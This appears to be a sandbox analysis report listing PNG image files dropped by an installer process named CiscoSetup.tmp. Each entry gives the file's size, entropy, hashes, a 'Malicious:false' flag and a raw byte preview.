                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...|....O..ZY.Z..!XT* ..,.%...n.R...R.,..)....Vy+..[+..DmA.l).&i.Xi!.XwB.....c....o.;...;..<.L2....<.l..{.9..s(.d..#3;....5...}....]#i.On.....F..G,O&}.]..m.l..rN.k.Jm}Me[...n........Lwe:...f.}`.k7]8......D........v.'(....t.E...^.v......n.....HO";.{.l.2...DX.6._.../.'.=.'9.#....9=... .z....-.>p..~..G......:H..=v...SV.....>..K...w....PYI.....G.mx+2;]az...|...>{...............m.j.*..'x.........n......q..T.9.ew........j'...W..D....-......6)....N2k.,z...+......0..z.x.......z.&./..?..;.0;..+....7Zg.w...B.Y*..qD.....9..G.......9~........S...O..._TTT...Qy\[.(..#c.k*......<..]k.^.c.Lv".5H... e...D./N'.E..tJ....TO.L?A......'..n...*/.....).vwA.bgRS..m.....+.m]~P'8.m.......p.t..a.=....Y.I...$..nO..$....~......m.7..........P.$g.......#.a.>c......;...Y...\.|7.]...S.z..C....=..c.f.2{\..g.h8..v@(....4.....e..fj..Q..{.E.'..../j?|.v..]s...R.......:..;.t.8....'.....x5..#...C..djj..U...8...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8594
                                                                                                                                                                                                  Entropy (8bit):7.973082494080156
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                                                                                  MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                                                                                  SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                                                                                  SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                                                                                  SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx....U..G!o.<.........Mi@...t+iV@[H.X..-MZ...6E.lZ...X.>%jW..&..]-P.JV.<..Z...Rt..@M.mM7...9sg..;s.{....s.3....o~.H...w.......-...-.<.......4.5.y..d'....7......b..{.....]7..?u......}5y...M.k...`..U.w.............>.}...h..s.... ....Gu!....[tc ;....F...v...k.{.x.'U..;..-..'...B.Y....I...R..0Zw...`u.C...|].....m...y...V.I..?.L.;.8.....Ez&\h.'y.........;...-...G.y/9*....}...S.@..+._..*..a.9WZ...._W+-.B.>.m..:....o..*\...<Mu`.a.........o..w.]@=/_|9Y..~....b...>.dk..4VY...5...v+r"...qw....sm..&.]."y.x..I...kt!fw..Xx.....\.,}.=.gH..AgA..xV.\t..".0.(...8a\.QJ..k..Hu.*.........E..l/...4=x.54l..$j.k3M.../.l|r.=...K.Rt.Z..........N....v...z..S...1^..u...P..j.BF.W...iH.....n).....=.s8...!bx.N<.\]....,.6..`..b~8...[..X..o..R.X.`!BiZ.0...t.im..o....n...s...|W..<....K.by..o..l......{.KMe.....g.n5..b+w.B.Ilo...M?.V:X...!..&.KJ...?...Lj......._.~...l.}...=..HO.@?!d_.O.Vy.....QI=..b4...8t
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4117
                                                                                                                                                                                                  Entropy (8bit):7.943813748161345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                                                                                  MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                                                                                  SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                                                                                  SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                                                                                  SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.l..u~s........)..(.,KQd.Ih...D5.q..(..@."6..E[.P...r.F..5..H..@Z'h....(:...P4.S..]..=..{..R.D.....@.;...w|.{..............@.DW.8........`.@/.!.N....o..r..D.\..]..? .";U_U...R../q.b.e.e..%-S..J..._1.....0...P(.....!........U.......kg.6...-....^.m...8.....E..3E.r}...._..fg&..............f1.....B.u\.g....zz.w...NWoc.... ...m.....9Z.'.....l..a.L..?.KX?>?V.:84X.../..7...._....#..zT.~.{wu..B......VI.l...e..F^.l...Hy...1..4...[.p......S....j./.t.0..c..O..Z6wGiw'..h........8..`w.g.5.Q..&*.Gxd...@3,..z...8.T...,..VAP$(.tm... .. ......*....\.`.Q.hQ.I\v.].....N..............}...@...%...........x.x.DU.e$..*m.5%..(.A".X.d@r...d.l....:.B..Q..U.H.5....X...k.'...p.>.ZCWo..{...j.2...[....Fg...0.\T...4d.'....%H.....@.k-...4!.+..B..Obr.=948..BgK5?..;Sv`.....)\d........u..}.pw..G.s.TV..R.<.7S......0}.......h.9..*.NG... W4..<*.!..>.U....;c.>..Z.sR..<w......I.....G:.>..#"...%...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4267
                                                                                                                                                                                                  Entropy (8bit):7.94257084168463
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                                                                                  MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                                                                                  SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                                                                                  SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                                                                                  SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...MIDATx..Zyl..u.s......x..$J.i).l.......6..8.k.h`....(Z.UZ.Q.-....4n...l...6r.@r.#J.K.M..O.7w.......{..R.E.....@.vvw...{..~..~....u7.).......Np..r..K.(f..%!.LB1k....p.......E..l.........x.."{$.Wl..hY.lAO.R..B*>d....c...D?.........*.......=...[....N....;.|..d.T.&..q..."....I...pi8...?...6...s.R.....z.......U5.pM{.j..C..k..wW.....W.e..X.....9"...Q.@.y.G.,.x<....Y...]....\.wn.........YsI..+.....m.?.o..^...`@:]...w#.sv....x....@..0As....!...j.^.q.~..G..z~x....q.....J..a......6=td.=.M..Z.k*..,.#......i.......xP......S.A. o.y.`A*.C.i%..5~......_.Y.?/.%.=z..dr...N..X.lz.....|......x.s6.d.". ........l....@Te.C.)..E..@..%.$..e.&..r..g...9.]k}.t..R...%..6..{............G^.o....F.!.F..Ar*`.<....L...&......S..y|..,$.Yp......A.X.t..N..q.....d.p0.A[S....m...2.g..nr...U...../.vu.........Z".Cl6.....Dt...s2.....l.`.(Z.x.2h...3.f....M.<.F.H)......q.H..p...n.M.......T..._..v?..5(x....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4052
                                                                                                                                                                                                  Entropy (8bit):7.943954771539964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                                                                                  MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                                                                                  SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                                                                                  SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                                                                                  SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...vIDATx..Y.o\.u?w.3sg..E..H..D-..YV.8n. J..H.......>...C...@..M..o...H..)...]4F....%...Lq.9.>w..|3#.L...h...K....9..;.|C...%}..)a...8..8IJ.H.;o.6.W'.Y.F.L^...a@(....K.)53....3...P,.2.=.I...6....]iV.v....r.....~yk..ej6..]...._8M..R.g.......f.[.......e,.,..i.I.D-.j..J.n....r...U.\[./....U6.$o^..ZE..7@J..I....5>.[g.:..gfBs.qy0....A..........HU%RdY..t=.,6....../5..;.\.....+/x..O...h'...1...8w~..o^=......v.Vk....wc.KA.:..."....D....)..R.e......}..{..w^.....Kd..}.]?7..lJ....O<..o^..../_>.d-.<.i....`{>.O>.w`./.dF.Rt...I..Q..{[0..J..h....T....RB...;.........]o...H...s.._.......L./O.P.....WT.P.A.....@..%RM....6@{....R5....5....M.....~....I...1s.K}.$..H.}./o.=...:..th...9=w.....(.R'-l......Lx. ..iP.iCu:.`.....\nP8.".......VoS8bR.......:..-....7..L).......M.j.rlv.......~..A9..ux.T.)_.S$.....6..<g..{..7..0...+...&h.f..%..\x^.h....1....(.....u):.S.N....Z....i....?.L_..+..%...]x..o...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):700
                                                                                                                                                                                                  Entropy (8bit):6.305816801627044
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                                                                                  MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                                                                                  SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                                                                                  SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                                                                                  SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...w..........C......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.L.'Y....IDATx...... ..A.............. @.@J...C...._..+.......=.T... `.u....A...|.H...0.:@.....q.>U$....w. @.@P....*........ @ (`.O......]... ..0....D.............SE"@..q........{.". @..........=.T... `.u....A...|.H...0.:@............X~....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                                  Entropy (8bit):7.848629133083243
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                                                                                  MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                                                                                  SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                                                                                  SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                                                                                  SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]+s#G..K..N0P..Nf)..0... ..v......l...P*.{(.2R.Yf...*,a.U.d....3.....g.,..~N..$$$$$$$$$$$$$$$$$H..^.b6h.@W}.?.V?oc..O.....x^_...lR.A.......=[,.zX}..S.^..y...8!.@..4...i.5..l...sEHl..p........D.HA2..K.)....:...l.Ud.k.........:........p..Re.J...U.Y..9(.>...%....a..e..V........D.:J.eL..GJ6.P.....3B.kG...wgCP).?.5qH....85|.tel.q..W..=..[.u.....w.3r..k.....RR.B....$....]*.}../.@.71.s0b.bNH4=m.l.^I..`.".. 2...X...^......U..s.!d........~..;..J.f..,)..T..V3+.g%.T.G.b..K.r..=.GF...GT5.s..N.l..:.$..,!.T.......r$>.H..1...Q..}.~&..z.:.iF.}@b..mP.....!B...e..R...A(....U.#..o5&a.43..."]".._..m.......7.G..w.5q&..V.............,.+)\.;.0zw.Th....;.!..^J..-...:L.L.iM..g..Zgq.N8.qhYd.?.7...=t.iL[..B........yi..L...q8w..>..x..p.O..VY.u.s....%A.....`...*.n..L.f...6_."..R.D...8..^...>.N.J.1.;.T....-...}~.M..J.:...B..{m.L.m...>.J;.\T.=).xQ..u{...f........!.)y]lck..W^.v.T.ms...%^..,.b..]ZZ...u.^...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):478
                                                                                                                                                                                                  Entropy (8bit):7.3703130572324955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                                                                                  MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                                                                                  SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                                                                                  SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                                                                                  SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH..U.m.@.}E. #d.n.. ..a....2@.6.p. a..AG...}..A.U..% ..g.g........u..%.w....'(.............%..{...S..p.gc.|...Y......|`I.\aZ..5..d@..>'.z.7.)....b...P.'...y..4.l...+........I!{......*w.eFV...d...H....xZT.c.F.=..*.f/.Q...".......BF7.a......)....|`..m.o..=.f.........%.d.._.........z!..&,6.;KwN@Z.<~1..%...b....L....<...k8.c.'.....+.&.dE...o..7.....ke..M..Ot..N..^..n.~............IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2245
                                                                                                                                                                                                  Entropy (8bit):7.881067272381913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                                                                                  MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                                                                                  SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                                                                                  SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                                                                                  SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...wIDATx..].R#9..w../..2.c.+..'....O.s..X...y......oD.s....g........nukZ.xo.*.,..f>...[..0`.......0.....y.bvh.9q.w.k....}_.cj.....1f....e...._R..}...1g...W.X.,9_L9/.>D..E..qi.3..&....h..C.....)....3.RI.aU.%...U.qd$..Yu..#CK5i..s...<..3K.u...F.r.R....V.c........>..3)j..>uhC.4....v.J.jm..c.L9.......8..WA.....x....j....3..:....>.c...95.|.eL.qI...V0+..'.l|.........0.. .)..V...z;..M";q.c....bv.T.K.....Fr...];bT%[...!.#..a.5..P..]Rx.X....Q.>1.F..=Rx.,L9.........ck,1G...'....#d...X@....w...'g.:.;)..S..vo..A...#..yo..M}A..+!.Q....h'....$<y..N...|..n..!.R......_.Y...1.C'G8)~.D.....H..-Pu......6N.>..0R.j....qP...../.9.]r..........."...<Cv.3r.(.W(.B$......N.....{I.R..Fok.b.-Pq_.$`*q...A.KLu......8.....x..=.?...).t....PyD.0.*m.........n.`/......zd^....I%...4.^.4C..!/w......l.HZ..l...T.>...KgH.5...}..+.6F.i....*.4.6%.....A;8`6q...Z].av....]']v.....W........L.W.R.MK..?%^R..RcL.3._#...G...1.{..0F %.h3....k.B.>r
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):543
                                                                                                                                                                                                  Entropy (8bit):7.547901309478316
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                                                                                  MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                                                                                  SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                                                                                  SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                                                                                  SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...R.1....y...U....kx..p.9..>@....' (d..=\..p..$....z...;s.In.}../..m.+..4..7.~...@e]...Wx.....~G.2.x+.6J.<&^..).Y.S....Tv.<....,.+..`....G>..Q!".5.h.l.}.I<...*S....t..>%r.0w{.1.mE .@.K.6.-........./L'S.7.|.j..]Z.w..<.'.Kk...`..0N..L..7_.(...C........8,.9. \.T.......K...\..0..L....:...!..}.$.(QQ.....T...../.)dzT..5..iu.......N./.....r.>}.&h%...x....o..6W...B.(...z.a...0w.....BYf.%.{.$.y.NUt*.@....F.T....ge.:v.m..t..xp....d......o.>.....0....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1702
                                                                                                                                                                                                  Entropy (8bit):7.836409910643584
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                                                                                  MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                                                                                  SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                                                                                  SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                                                                                  SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...XIDATx..=R.X..{w.l8..8#..-...f.'.9...lhs.)...N`q...!...=.I7.zz-F.H..7._.U.3#.^.[..Z..(..(..(..(..l).e}YE9.....U.[qy..W)Ei....GP-*A...=G......b....R\..R.h..}.]W.>T...Pt.j).Vp.,...*..y1c.......jx...W(Zr....xv.|9..%....$g5.Z.'$.r .......7r..b.y.P.....1.(.)V..P-.Q.._)k..1.t.._....W.R.o...O.d.n................Cl....r.E...m..P...6..,.[!],.m...]..Y-v..6.j.p\c.g.2u...-Bs......k{........^V....e.F...N.u..=.Hw..1..&.....y^..i].E.B ..{.}.....n0w......1.ES..m....p.....R.Q._......gF.Gp.#..v..<~.;t.Xr.nx.bs.K.s.c..<.j#Qf.6k....x..{.....}.?;uS..{.y...y....<..9Q.c"..I;....;^N...n% .O....<.V..;......G..+E....h-....M.T-....."V..G[...S..~r...-.L"f%0@.1.Zx....0 .]d1+.Az.~.b...d.......b....Z*.......k.YZ.m.q....WX....0..G.T......]....s,.obV7..D.7h.2r..g..(<J....+..(V..*.y[.!f..Z..>..".I..t....ab.v....M9...)..U.h..M#.....JA/.VP.>......wB.......^1.....d..R..9Orm-.....R.C..%..(...d...J9#6...{TpXJp....j
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                                                  Entropy (8bit):7.261808950496785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                                                                                  MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                                                                                  SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                                                                                  SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                                                                                  SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....SIDATH..U.Q.0.}e.. ...............N@..3I.A.!.../.......r......SXTW.t..3.n..g.....!/k.t..{....=.^.+E.U..KD.@..@..)..sV...7u..[!_+..F.......#.......?$....3.t....;8.D...N.pv.H...Q\r.....T.t..t..F......~....1a3g......Y..L.#.F%..-.(.o...bl.}..=...T.d2.[.x".m..b.V*./........T...(..+.>[F5....7..j..2:....-;.....P.w|j..d.s.........&.cO........IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1856
                                                                                                                                                                                                  Entropy (8bit):7.845521158056495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                                                                                  MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                                                                                  SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                                                                                  SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                                                                                  SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..r.F...I.t..X..*.&T..P.JT.*...d.)0..@.....I.T...~..L.9...".....s.7..{D..|..?w.D".H$..D"......$...h..{*...#..C..6dDt...0..]..6.v.<.,.....8E.k...$.h..j)..s...C.XE.r]5\..E|..].bDY.....Rl...\X..p]WMt.,..Q..O...Oe...........\..b...1.|BY.f.r.d.5.]..#e..h.u]5.y%...DtGD....q_Z.m.Vi.+*......5....{G.^~'..-.8..Xx...xK.-...[.a...2_wa...%....E..!...m1XKi.d...r...o.v.>.SIeq..)m....AH.....^.F.?.....w...?.s.G.......^r...G.(.viDh.X....O.>..+..5@....9....+..]W......m.emb!...../....W..WS?8d.E.<.Q...S...!.!#.R.u5........4..Qn.F*.G[.PYQY@...D........|..,.*.am....h..k..e"0'....IQJ..@N..7...&^.Y.S..........Q[o..../|j":.xnb._q...{^c'..Lz..!(.t..t..k.X...n..+................xLkzz....W..RVr.....Q.wy.T.........]... $n)d..#..........%..}.Hx..q..,T7..F..v....=7p..$(....].S.....D......=...m.B.......ML ..%...X...U.*...e..H..EM.?......].....D...o.).M...W.P.h......=..#..4...Z..0Yn.E..?...K ;K.$..n..Zq-A..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):472
                                                                                                                                                                                                  Entropy (8bit):7.339402871750466
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                                                                                  MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                                                                                  SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                                                                                  SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                                                                                  SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
